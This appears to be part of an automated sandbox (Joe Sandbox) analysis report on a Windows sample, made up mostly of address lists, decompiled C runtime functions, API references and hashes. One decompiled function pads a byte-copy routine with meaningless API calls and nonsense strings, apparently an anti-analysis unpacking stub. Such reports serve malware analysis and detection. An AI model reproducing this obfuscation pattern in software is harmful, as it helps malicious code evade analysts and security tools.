                            0x00423d6a
                            0x00423337
                            0x00423337
                            0x0042333e
                            0x00423344
                            0x0042334a
                            0x0042334d
                            0x00423353
                            0x00423360
                            0x00423366
                            0x00423366
                            0x0042336d
                            0x00000000
                            0x004236f1
                            0x004236f1
                            0x004236ff
                            0x00423702
                            0x00000000
                            0x00000000
                            0x00423374
                            0x00423377
                            0x0042337d
                            0x00423382
                            0x00423385
                            0x00423385
                            0x00000000
                            0x00000000
                            0x004234ba
                            0x004234bd
                            0x004234c2
                            0x004234c7
                            0x004234ca
                            0x004234ca
                            0x00000000
                            0x00000000
                            0x004238bd
                            0x004238bd
                            0x00000000
                            0x00000000
                            0x00423424
                            0x00423424
                            0x00423430
                            0x0042343d
                            0x0042344b
                            0x0042344b
                            0x00423451
                            0x00423454
                            0x00423460
                            0x004234b5
                            0x00000000
                            0x004234b5
                            0x0042343f
                            0x0042343f
                            0x00423449
                            0x00423465
                            0x00423468
                            0x0042346e
                            0x00423496
                            0x0042349d
                            0x004234a3
                            0x004234a6
                            0x004234a9
                            0x004234af
                            0x004234b2
                            0x00423470
                            0x00423470
                            0x00423476
                            0x00423479
                            0x0042347c
                            0x00423482
                            0x00423485
                            0x00423488
                            0x0042348a
                            0x0042348d
                            0x0042348d
                            0x00000000
                            0x0042346e
                            0x00000000
                            0x00000000
                            0x00423709
                            0x0042370c
                            0x0042370f
                            0x00423712
                            0x00423718
                            0x0042371b
                            0x00423726
                            0x00423731
                            0x00423735
                            0x0042374c
                            0x00423753
                            0x00423755
                            0x00423755
                            0x0042375c
                            0x00423763
                            0x00423771
                            0x00423774
                            0x00423783
                            0x0042378a
                            0x0042379f
                            0x0042378c
                            0x0042378c
                            0x0042378f
                            0x00423795
                            0x0042379a
                            0x0042379a
                            0x0042378a
                            0x004237a9
                            0x004237ac
                            0x004237af
                            0x004237b2
                            0x004237b5
                            0x004237b8
                            0x004237be
                            0x004237c4
                            0x004237cc
                            0x004237cd
                            0x004237d0
                            0x004237d1
                            0x004237d4
                            0x004237d5
                            0x004237dc
                            0x004237dd
                            0x004237e0
                            0x004237e1
                            0x004237e4
                            0x004237e5
                            0x004237eb
                            0x004237ec
                            0x004237fb
                            0x004237fd
                            0x00423803
                            0x00423808
                            0x00423810
                            0x00423818
                            0x00423819
                            0x0042381c
                            0x0042381d
                            0x0042382c
                            0x0042382e
                            0x0042382e
                            0x00423831
                            0x0042383b
                            0x00423840
                            0x00423846
                            0x00423848
                            0x00423850
                            0x00423851
                            0x00423854
                            0x00423855
                            0x00423863
                            0x00423865
                            0x00423865
                            0x00423846
                            0x00423868
                            0x0042386b
                            0x00423871
                            0x00423876
                            0x0042387b
                            0x00423881
                            0x00423884
                            0x00423884
                            0x00423887
                            0x00423893
                            0x00000000
                            0x00423893
                            0x00423737
                            0x00423737
                            0x00423741
                            0x00000000
                            0x00000000
                            0x00423743
                            0x00423743
                            0x00000000
                            0x00423743
                            0x00423728
                            0x00423728
                            0x00000000
                            0x00000000
                            0x00423388
                            0x00423388
                            0x00423393
                            0x0042339b
                            0x004233a2
                            0x004233a5
                            0x004233a8
                            0x00423408
                            0x004233aa
                            0x004233b1
                            0x004233b7
                            0x004233bd
                            0x004233c4
                            0x004233c7
                            0x004233cd
                            0x004233d5
                            0x004233d7
                            0x004233de
                            0x004233e5
                            0x004233f6
                            0x004233f8
                            0x004233f8
                            0x004233ff
                            0x0042340f
                            0x00423415
                            0x00423418
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004235fa
                            0x004235fa
                            0x00423606
                            0x00423613
                            0x004236bd
                            0x004236bd
                            0x004236c0
                            0x004236c3
                            0x004236d7
                            0x004236dd
                            0x004236e3
                            0x004236c5
                            0x004236c5
                            0x004236cb
                            0x004236d2
                            0x004236d2
                            0x004236e5
                            0x00000000
                            0x004236e5
                            0x00423619
                            0x00423619
                            0x0042361b
                            0x00423629
                            0x0042361d
                            0x0042361d
                            0x0042361d
                            0x00423633
                            0x00423639
                            0x00423646
                            0x00423648
                            0x0042364d
                            0x0042364f
                            0x00423654
                            0x00423659
                            0x0042365b
                            0x00423660
                            0x00423666
                            0x00423668
                            0x00423668
                            0x00423666
                            0x00423670
                            0x004236b8
                            0x00000000
                            0x00423672
                            0x00423672
                            0x00423677
                            0x00423693
                            0x0042369b
                            0x004236a5
                            0x004236a8
                            0x004236ad
                            0x00000000
                            0x004236ad
                            0x00000000
                            0x00423904
                            0x00423904
                            0x0042390e
                            0x00423914
                            0x00423919
                            0x0042391f
                            0x0042391f
                            0x00000000
                            0x00000000
                            0x004238b6
                            0x004238b6
                            0x00000000
                            0x00000000
                            0x004234cd
                            0x004234d1
                            0x004234df
                            0x004234e2
                            0x004234d3
                            0x004234d3
                            0x004234d3
                            0x004234e8
                            0x004234ee
                            0x004234f4
                            0x00423500
                            0x00423506
                            0x00423509
                            0x00423591
                            0x00423595
                            0x00423597
                            0x0042359d
                            0x0042359d
                            0x004235a0
                            0x004235a7
                            0x004235aa
                            0x004235b0
                            0x004235b0
                            0x004235b0
                            0x004235b6
                            0x004235bc
                            0x004235bf
                            0x004235c7
                            0x00000000
                            0x00000000
                            0x004235c9
                            0x004235c9
                            0x004235cf
                            0x004235d4
                            0x00000000
                            0x00000000
                            0x004235d6
                            0x004235dc
                            0x004235df
                            0x004235df
                            0x004235e7
                            0x004235ed
                            0x004235f0
                            0x004235f2
                            0x00000000
                            0x0042350f
                            0x0042350f
                            0x00423513
                            0x00423515
                            0x0042351a
                            0x0042351a
                            0x0042351d
                            0x00423520
                            0x00423526
                            0x00423538
                            0x00423538
                            0x00423538
                            0x00423541
                            0x00000000
                            0x00000000
                            0x00423543
                            0x00423543
                            0x00423549
                            0x0042354e
                            0x00000000
                            0x00000000
                            0x00423550
                            0x00423550
                            0x00423559
                            0x0042355f
                            0x0042356d
                            0x00423575
                            0x00423578
                            0x00423578
                            0x00423584
                            0x00423587
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00000000
                            0x004235f5
                            0x00000000
                            0x004238ad
                            0x004238ad
                            0x00000000
                            0x00000000
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0042336d
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423a07
                            0x004239fe
                            0x00423922
                            0x00423922
                            0x00423922

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                            • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                            • API String ID: 3455034128-2408376751
                            • Opcode ID: 6f2a798db55e4a7cf6209d4ba5a920d7c5354e6626bcc809b6feb83814e459b9
                            • Instruction ID: c187653df57bb1a9f465db3ba75020c3650336f8aded395c2ef10ecf92f4a372
                            • Opcode Fuzzy Hash: 6f2a798db55e4a7cf6209d4ba5a920d7c5354e6626bcc809b6feb83814e459b9
                            • Instruction Fuzzy Hash: FAF17CB1E002299FDB24CF48DC81BAEB7B1BF85305F5441EAE249A7241D7389E84CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00409B30(intOrPtr _a4) {
                            				struct _DCB _v28;
                            				struct _COMMTIMEOUTS _v48;
                            				long _v60;
                            				intOrPtr _t12;
                            				intOrPtr _t14;
                            				void** _t33;
                            
                            				if( *0x6328e4 == 0x37) {
                            					_v48.ReadTotalTimeoutMultiplier = 0;
                            					_v48.ReadTotalTimeoutConstant = 0;
                            					_v48.WriteTotalTimeoutMultiplier = 0;
                            					_v48.WriteTotalTimeoutConstant = 0;
                            					_v48.ReadIntervalTimeout = 0;
                            					BuildCommDCBAndTimeoutsW(L"cefucah zugukuleyevalecuf coyefafipalicozexayuluyegefu tazugisipeb zewavutibobakezawuhaxu",  &_v28,  &_v48);
                            					GetDriveTypeA("pihevaxoduyuro");
                            					CallNamedPipeW(0, 0, 0, 0, 0, 0, 0);
                            					GetThreadPriority(0);
                            					GlobalDeleteAtom(0);
                            					FindAtomW(L"Johufiyonu");
                            					__imp__SetComputerNameExW(0, L"sesujucuyeritaliji");
                            					WriteConsoleInputA(0, 0, 0,  &_v60);
                            					GetWriteWatch(0, 0, 0, 0, 0, 0);
                            					__imp__FindNextVolumeMountPointA(0, 0, 0);
                            					__imp__CreateTimerQueue();
                            					FreeEnvironmentStringsW(0);
                            					WritePrivateProfileStructA(0, 0, 0, 0, 0);
                            					EscapeCommFunction(0, 0);
                            				}
                            				 *_t33 = 0;
                            				_t12 =  *0x6328e8; // 0x423c7a
                            				 *_t33 =  *_t33 + _t12;
                            				 *_t33 =  *_t33 + 0x38d6;
                            				_t14 = _a4;
                            				 *((char*)( *0x615d40 + _t14)) =  *((intOrPtr*)( *_t33 + _t14));
                            				return _t14;
                            			}









                            0x00409b3a
                            0x00409b42
                            0x00409b46
                            0x00409b4a
                            0x00409b4e
                            0x00409b61
                            0x00409b69
                            0x00409b74
                            0x00409b88
                            0x00409b90
                            0x00409b98
                            0x00409ba3
                            0x00409bb0
                            0x00409bc1
                            0x00409bd3
                            0x00409bdf
                            0x00409be5
                            0x00409bed
                            0x00409bfd
                            0x00409c07
                            0x00409c07
                            0x00409c0d
                            0x00409c14
                            0x00409c19
                            0x00409c21
                            0x00409c27
                            0x00409c34
                            0x00409c3a

                            APIs
                            • BuildCommDCBAndTimeoutsW.KERNEL32 ref: 00409B69
                            • GetDriveTypeA.KERNEL32(pihevaxoduyuro), ref: 00409B74
                            • CallNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409B88
                            • GetThreadPriority.KERNEL32(00000000), ref: 00409B90
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 00409B98
                            • FindAtomW.KERNEL32(Johufiyonu), ref: 00409BA3
                            • SetComputerNameExW.KERNEL32(00000000,sesujucuyeritaliji), ref: 00409BB0
                            • WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00409BC1
                            • GetWriteWatch.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409BD3
                            • FindNextVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 00409BDF
                            • CreateTimerQueue.KERNEL32 ref: 00409BE5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409BED
                            • WritePrivateProfileStructA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409BFD
                            • EscapeCommFunction.KERNEL32(00000000,00000000), ref: 00409C07
                            Strings
                            • cefucah zugukuleyevalecuf coyefafipalicozexayuluyegefu tazugisipeb zewavutibobakezawuhaxu, xrefs: 00409B5C
                            • Johufiyonu, xrefs: 00409B9E
                            • sesujucuyeritaliji, xrefs: 00409BA9
                            • z<B, xrefs: 00409C14
                            • pihevaxoduyuro, xrefs: 00409B6F
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Write$AtomCommFind$BuildCallComputerConsoleCreateDeleteDriveEnvironmentEscapeFreeFunctionGlobalInputMountNameNamedNextPipePointPriorityPrivateProfileQueueStringsStructThreadTimeoutsTimerTypeVolumeWatch
                            • String ID: Johufiyonu$cefucah zugukuleyevalecuf coyefafipalicozexayuluyegefu tazugisipeb zewavutibobakezawuhaxu$pihevaxoduyuro$sesujucuyeritaliji$z<B
                            • API String ID: 293722815-4125814950
                            • Opcode ID: 26c43a98229c97212bd180767575e2d4bc9e5ec4421956c4e24a202d83c2b1b6
                            • Instruction ID: a8fb35be1fb3c2411ff09792b467be962dccc43bc3f5e42330bd6c9e555d6447
                            • Opcode Fuzzy Hash: 26c43a98229c97212bd180767575e2d4bc9e5ec4421956c4e24a202d83c2b1b6
                            • Instruction Fuzzy Hash: CF211F35648341EFE340AFA4EE49B597BB0BB48B02F104429F7CAE55F1D6B05484CB6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E0041DB63(void* __ebx, void* __edi, void* __esi) {
                            				intOrPtr* _t143;
                            				signed int* _t145;
                            				int _t150;
                            				intOrPtr* _t167;
                            				intOrPtr _t189;
                            				void* _t206;
                            				intOrPtr _t223;
                            				intOrPtr _t230;
                            				void* _t272;
                            				void* _t273;
                            				signed int _t274;
                            
                            				_t273 = __esi;
                            				_t272 = __edi;
                            				_t206 = __ebx;
                            				if( *(_t274 + 8) == 0) {
                            					_t143 = E0040D3B0(_t274 - 0x20);
                            					_t208 =  *_t143;
                            					if( *((intOrPtr*)( *_t143 + 0x14)) != 0) {
                            						_t210 = _t274 - 0x20;
                            						_t145 = E0040D3B0(_t274 - 0x20);
                            						_t256 =  *_t145;
                            						 *(_t274 - 4) = WideCharToMultiByte( *( *_t145 + 4), 0,  *(_t274 + 0xc), 0xffffffff, 0, 0, 0, _t274 - 0x10);
                            						if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
                            							 *((intOrPtr*)(L0040EC70(_t210))) = 0x2a;
                            							 *(_t274 - 0x68) = 0xffffffff;
                            							E0040D380(_t274 - 0x20);
                            							_t150 =  *(_t274 - 0x68);
                            						} else {
                            							 *(_t274 - 0x6c) =  *(_t274 - 4) - 1;
                            							E0040D380(_t274 - 0x20);
                            							_t150 =  *(_t274 - 0x6c);
                            						}
                            					} else {
                            						_t256 =  *(_t274 + 0xc);
                            						 *(_t274 - 0x64) = E00418B40(_t208,  *(_t274 + 0xc));
                            						E0040D380(_t274 - 0x20);
                            						_t150 =  *(_t274 - 0x64);
                            					}
                            					L47:
                            					return E00416CA0(_t150, _t206,  *(_t274 - 0x24) ^ _t274, _t256, _t272, _t273);
                            				}
                            				if( *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t274 - 0x20))) + 0x14)) != 0) {
                            					if( *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t274 - 0x20))) + 0xac)) != 1) {
                            						_t223 =  *((intOrPtr*)(E0040D3B0(_t274 - 0x20)));
                            						_t256 =  *(_t223 + 4);
                            						 *(_t274 - 4) = WideCharToMultiByte( *(_t223 + 4), 0,  *(_t274 + 0xc), 0xffffffff,  *(_t274 + 8),  *(_t274 + 0x10), 0, _t274 - 0x10);
                            						if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
                            							if( *(_t274 - 0x10) != 0 || GetLastError() != 0x7a) {
                            								 *((intOrPtr*)(L0040EC70(_t223))) = 0x2a;
                            								 *(_t274 - 0x4c) = 0xffffffff;
                            								E0040D380(_t274 - 0x20);
                            								_t150 =  *(_t274 - 0x4c);
                            							} else {
                            								while( *(_t274 - 4) <  *(_t274 + 0x10)) {
                            									_t167 = E0040D3B0(_t274 - 0x20);
                            									_t230 =  *((intOrPtr*)(E0040D3B0(_t274 - 0x20)));
                            									_t256 =  *(_t230 + 4);
                            									 *((intOrPtr*)(_t274 - 0xc)) = WideCharToMultiByte( *(_t230 + 4), 0,  *(_t274 + 0xc), 1, _t274 - 0x2c,  *( *_t167 + 0xac), 0, _t274 - 0x10);
                            									if( *((intOrPtr*)(_t274 - 0xc)) == 0 ||  *(_t274 - 0x10) != 0) {
                            										 *((intOrPtr*)(L0040EC70(_t230))) = 0x2a;
                            										 *(_t274 - 0x50) = 0xffffffff;
                            										E0040D380(_t274 - 0x20);
                            										_t150 =  *(_t274 - 0x50);
                            									} else {
                            										if( *((intOrPtr*)(_t274 - 0xc)) < 0 ||  *((intOrPtr*)(_t274 - 0xc)) > 5) {
                            											 *((intOrPtr*)(L0040EC70(_t230))) = 0x2a;
                            											 *(_t274 - 0x54) = 0xffffffff;
                            											E0040D380(_t274 - 0x20);
                            											_t150 =  *(_t274 - 0x54);
                            										} else {
                            											if( *(_t274 - 4) +  *((intOrPtr*)(_t274 - 0xc)) <=  *(_t274 + 0x10)) {
                            												 *(_t274 - 8) = 0;
                            												while( *(_t274 - 8) <  *((intOrPtr*)(_t274 - 0xc))) {
                            													( *(_t274 + 8))[ *(_t274 - 4)] =  *((intOrPtr*)(_t274 +  *(_t274 - 8) - 0x2c));
                            													_t256 =  &(( *(_t274 + 8))[ *(_t274 - 4)]);
                            													if(( *(_t274 + 8))[ *(_t274 - 4)] != 0) {
                            														 *(_t274 - 8) =  *(_t274 - 8) + 1;
                            														 *(_t274 - 4) =  *(_t274 - 4) + 1;
                            														continue;
                            													}
                            													 *(_t274 - 0x5c) =  *(_t274 - 4);
                            													E0040D380(_t274 - 0x20);
                            													_t150 =  *(_t274 - 0x5c);
                            													goto L47;
                            												}
                            												_t256 =  &(( *(_t274 + 0xc))[1]);
                            												 *(_t274 + 0xc) =  &(( *(_t274 + 0xc))[1]);
                            												continue;
                            											}
                            											 *(_t274 - 0x58) =  *(_t274 - 4);
                            											E0040D380(_t274 - 0x20);
                            											_t150 =  *(_t274 - 0x58);
                            										}
                            									}
                            									goto L47;
                            								}
                            								 *(_t274 - 0x60) =  *(_t274 - 4);
                            								E0040D380(_t274 - 0x20);
                            								_t150 =  *(_t274 - 0x60);
                            							}
                            						} else {
                            							 *(_t274 - 0x48) =  *(_t274 - 4) - 1;
                            							E0040D380(_t274 - 0x20);
                            							_t150 =  *(_t274 - 0x48);
                            						}
                            						goto L47;
                            					}
                            					if( *(_t274 + 0x10) > 0) {
                            						 *(_t274 + 0x10) = E0041DF50( *(_t274 + 0xc),  *(_t274 + 0x10));
                            					}
                            					_t256 =  *(_t274 + 0xc);
                            					_t189 =  *((intOrPtr*)(E0040D3B0(_t274 - 0x20)));
                            					_t243 =  *(_t189 + 4);
                            					 *(_t274 - 4) = WideCharToMultiByte( *(_t189 + 4), 0,  *(_t274 + 0xc),  *(_t274 + 0x10),  *(_t274 + 8),  *(_t274 + 0x10), 0, _t274 - 0x10);
                            					if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
                            						 *((intOrPtr*)(L0040EC70(_t243))) = 0x2a;
                            						 *(_t274 - 0x44) = 0xffffffff;
                            						E0040D380(_t274 - 0x20);
                            						_t150 =  *(_t274 - 0x44);
                            					} else {
                            						if( *((char*)( &(( *(_t274 + 8))[ *(_t274 - 4)]) - 1)) == 0) {
                            							 *(_t274 - 4) =  *(_t274 - 4) - 1;
                            						}
                            						_t256 =  *(_t274 - 4);
                            						 *(_t274 - 0x40) =  *(_t274 - 4);
                            						E0040D380(_t274 - 0x20);
                            						_t150 =  *(_t274 - 0x40);
                            					}
                            					goto L47;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					L2:
                            					_t248 =  *(_t274 - 4);
                            					if( *(_t274 - 4) >=  *(_t274 + 0x10)) {
                            						break;
                            					}
                            					_t256 =  *(_t274 + 0xc);
                            					if(( *( *(_t274 + 0xc)) & 0x0000ffff) <= 0xff) {
                            						( *(_t274 + 8))[ *(_t274 - 4)] =  *( *(_t274 + 0xc));
                            						_t256 =  *( *(_t274 + 0xc)) & 0x0000ffff;
                            						 *(_t274 + 0xc) =  &(( *(_t274 + 0xc))[1]);
                            						if(( *( *(_t274 + 0xc)) & 0x0000ffff) != 0) {
                            							_t256 =  *(_t274 - 4) + 1;
                            							 *(_t274 - 4) =  *(_t274 - 4) + 1;
                            							continue;
                            						}
                            						 *(_t274 - 0x38) =  *(_t274 - 4);
                            						E0040D380(_t274 - 0x20);
                            						_t150 =  *(_t274 - 0x38);
                            					} else {
                            						 *((intOrPtr*)(L0040EC70(_t248))) = 0x2a;
                            						 *(_t274 - 0x34) = 0xffffffff;
                            						E0040D380(_t274 - 0x20);
                            						_t150 =  *(_t274 - 0x34);
                            					}
                            					goto L47;
                            				}
                            				 *(_t274 - 0x3c) =  *(_t274 - 4);
                            				E0040D380(_t274 - 0x20);
                            				_t150 =  *(_t274 - 0x3c);
                            				goto L47;
                            			}














                            0x0041db63
                            0x0041db63
                            0x0041db63
                            0x0041db67
                            0x0041de9e
                            0x0041dea3
                            0x0041dea9
                            0x0041dedb
                            0x0041dede
                            0x0041dee3
                            0x0041deef
                            0x0041def6
                            0x0041df03
                            0x0041df09
                            0x0041df13
                            0x0041df18
                            0x0041df1d
                            0x0041df23
                            0x0041df29
                            0x0041df2e
                            0x0041df2e
                            0x0041deab
                            0x0041deab
                            0x0041deb7
                            0x0041debd
                            0x0041dec2
                            0x0041dec2
                            0x0041df3b
                            0x0041df48
                            0x0041df48
                            0x0041db7b
                            0x0041dc25
                            0x0041dcf1
                            0x0041dcf3
                            0x0041dcfd
                            0x0041dd04
                            0x0041dd29
                            0x0041dd3b
                            0x0041dd41
                            0x0041dd4b
                            0x0041dd50
                            0x0041dd58
                            0x0041dd58
                            0x0041dd6d
                            0x0041dd8f
                            0x0041dd91
                            0x0041dd9b
                            0x0041dda2
                            0x0041ddaf
                            0x0041ddb5
                            0x0041ddbf
                            0x0041ddc4
                            0x0041ddcc
                            0x0041ddd0
                            0x0041dddd
                            0x0041dde3
                            0x0041dded
                            0x0041ddf2
                            0x0041ddfa
                            0x0041de03
                            0x0041de1b
                            0x0041de36
                            0x0041de4b
                            0x0041de50
                            0x0041de58
                            0x0041de2a
                            0x0041de33
                            0x00000000
                            0x0041de33
                            0x0041de5d
                            0x0041de63
                            0x0041de68
                            0x00000000
                            0x0041de68
                            0x0041de75
                            0x0041de78
                            0x00000000
                            0x0041de78
                            0x0041de08
                            0x0041de0e
                            0x0041de13
                            0x0041de13
                            0x0041ddd0
                            0x00000000
                            0x0041dda2
                            0x0041de83
                            0x0041de89
                            0x0041de8e
                            0x0041de8e
                            0x0041dd0c
                            0x0041dd12
                            0x0041dd18
                            0x0041dd1d
                            0x0041dd1d
                            0x00000000
                            0x0041dd04
                            0x0041dc2f
                            0x0041dc41
                            0x0041dc41
                            0x0041dc56
                            0x0041dc64
                            0x0041dc66
                            0x0041dc70
                            0x0041dc77
                            0x0041dcb1
                            0x0041dcb7
                            0x0041dcc1
                            0x0041dcc6
                            0x0041dc7f
                            0x0041dc8b
                            0x0041dc93
                            0x0041dc93
                            0x0041dc96
                            0x0041dc99
                            0x0041dc9f
                            0x0041dca4
                            0x0041dca4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0041db81
                            0x0041db81
                            0x0041db81
                            0x0041db87
                            0x00000000
                            0x00000000
                            0x0041db89
                            0x0041db94
                            0x0041dbc3
                            0x0041dbc8
                            0x0041dbd1
                            0x0041dbd6
                            0x0041dbf1
                            0x0041dbf4
                            0x00000000
                            0x0041dbf4
                            0x0041dbdb
                            0x0041dbe1
                            0x0041dbe6
                            0x0041db96
                            0x0041db9b
                            0x0041dba1
                            0x0041dbab
                            0x0041dbb0
                            0x0041dbb0
                            0x00000000
                            0x0041db94
                            0x0041dbfc
                            0x0041dc02
                            0x0041dc07
                            0x00000000

                            APIs
                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DBAB
                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DBE1
                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DC02
                            • wcsncnt.LIBCMTD ref: 0041DC39
                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041DC6A
                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DC9F
                            • _wcslen.LIBCMTD ref: 0041DEAF
                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DEBD
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide_wcslenwcsncnt
                            • String ID:
                            • API String ID: 4277434810-0
                            • Opcode ID: dea9e2beb4e0d80b4cb8887b6ce4d8c909745e96bfec91943787277cc423218e
                            • Instruction ID: de2b87b64d129ef9f79e6306887f4dc3efd560aa30a83e94199d6f00b94e77c0
                            • Opcode Fuzzy Hash: dea9e2beb4e0d80b4cb8887b6ce4d8c909745e96bfec91943787277cc423218e
                            • Instruction Fuzzy Hash: 19D11EB1D00208EFCF08DF94C995AEEB771FF55314F10816AE5126B2A0D738AE85DB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 0040C5FA
                            • _CrtIsValidHeapPointer(pUserData), xrefs: 0040C3E1
                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040C4C9
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040C3ED, 0040C44B, 0040C606
                            • tDj, xrefs: 0040C38B
                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 0040C5C1
                            • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 0040C359
                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 0040C507
                            • Client hook free failure., xrefs: 0040C3AC
                            • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040C43F
                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040C583
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: BytesCheck$HeapPointerValid__free_base_memset
                            • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ$tDj
                            • API String ID: 25084783-3417358119
                            • Opcode ID: fbe4c74e015f64c54af3eb90b61c0f23deadd203539db0b0d2051a21d28a637e
                            • Instruction ID: cbe3cb26be786207528841e0087c9d635405288c5bca30eaf78aa0bd5529aeaa
